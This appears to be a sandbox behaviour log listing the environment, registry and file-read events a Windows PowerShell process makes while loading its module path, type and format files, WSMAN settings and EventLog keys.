System	Get Info	type = Operating System	1	Fn
Environment	Get Environment String	name = MshEnableTrace	13	Fn
Environment	Get Environment String	name = PSMODULEPATH, result_out = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = PSMODULEPATH, data = 0, type = REG_EXPAND_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = PSMODULEPATH, data = %SystemRoot%\system32\WindowsPowerShell\v1.0\Modules\, type = REG_EXPAND_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Environment	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Environment, value_name = PSMODULEPATH, type = REG_NONE	1	Fn
Environment	Set Environment String	name = PSMODULEPATH, value = C:\Users\aDU0VK IWA5kLS\Documents\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules\	1	Fn
Environment	Get Environment String	name = MshEnableTrace	4	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell, value_name = path, data = 0, type = REG_SZ	2	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell, value_name = path, data = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, type = REG_SZ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, type = file_attributes	1	Fn
Environment	Get Environment String	name = MshEnableTrace	2	Fn
File	Create	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, type = file_type	2	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, size = 4096, size_out = 4096	3	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, size = 4096, size_out = 3315	1	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, size = 781, size_out = 0	1	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, size = 4096, size_out = 0	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, type = file_attributes	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
System	Get Info	type = Hardware Information	1	Fn
File	Create	filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, type = file_type	2	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, size = 4096, size_out = 4096	41	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, size = 4096, size_out = 436	1	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, size = 4096, size_out = 0	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, type = file_attributes	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell, value_name = path, data = 0, type = REG_SZ	2	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell, value_name = path, data = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, type = REG_SZ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml, type = file_attributes	1	Fn
Environment	Get Environment String	name = MshEnableTrace	4	Fn
File	Create	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, type = file_type	2	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, size = 4096, size_out = 4096	6	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, size = 4096, size_out = 2530	1	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, size = 542, size_out = 0	1	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, size = 4096, size_out = 0	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, type = file_attributes	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
File	Create	filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, type = file_type	2	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 4096, size_out = 4096	5	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 4096, size_out = 4018	1	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 78, size_out = 0	1	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 4096, size_out = 0	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, type = file_attributes	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
File	Create	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, type = file_type	2	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, size = 4096, size_out = 4096	6	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, size = 4096, size_out = 2762	1	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, size = 310, size_out = 0	1	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, size = 4096, size_out = 0	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, type = file_attributes	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
File	Create	filename = C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, type = file_type	2	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, size = 4096, size_out = 4096	17	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, size = 4096, size_out = 3022	1	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, size = 50, size_out = 0	1	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, size = 4096, size_out = 0	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, type = file_attributes	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
File	Create	filename = C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, type = file_type	2	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, size = 4096, size_out = 4096	6	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, size = 4096, size_out = 281	1	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, size = 4096, size_out = 0	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, type = file_attributes	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
File	Create	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml, type = file_type	2	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml, size = 4096, size_out = 4096	62	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml, size = 4096, size_out = 3895	1	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml, size = 201, size_out = 0	1	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml, size = 4096, size_out = 0	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml, type = file_attributes	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
File	Create	filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, type = file_type	2	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, size = 4096, size_out = 4096	21	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, size = 4096, size_out = 3687	1	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, size = 409, size_out = 0	1	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, size = 4096, size_out = 0	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, type = file_attributes	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
File	Create	filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, type = file_type	2	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, size = 4096, size_out = 4096	4	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, size = 4096, size_out = 2228	1	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, size = 844, size_out = 0	1	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, size = 4096, size_out = 0	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, type = file_attributes	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
File	Create	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml, type = file_type	2	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml, size = 4096, size_out = 4096	4	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml, size = 4096, size_out = 3736	1	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml, size = 360, size_out = 0	1	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml, size = 4096, size_out = 0	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml, type = file_attributes	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
Environment	Get Environment String	name = MshEnableTrace	7	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Get Key Info	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Enumerate Values	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Enumerate Values	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Enumerate Values	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 2.0, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Get Key Info	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Enumerate Values	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Enumerate Values	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Enumerate Values	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 2.0, type = REG_SZ	1	Fn
Environment	Get Environment String	name = MshEnableTrace	2	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Get Key Info	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Get Key Info	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell	1	Fn
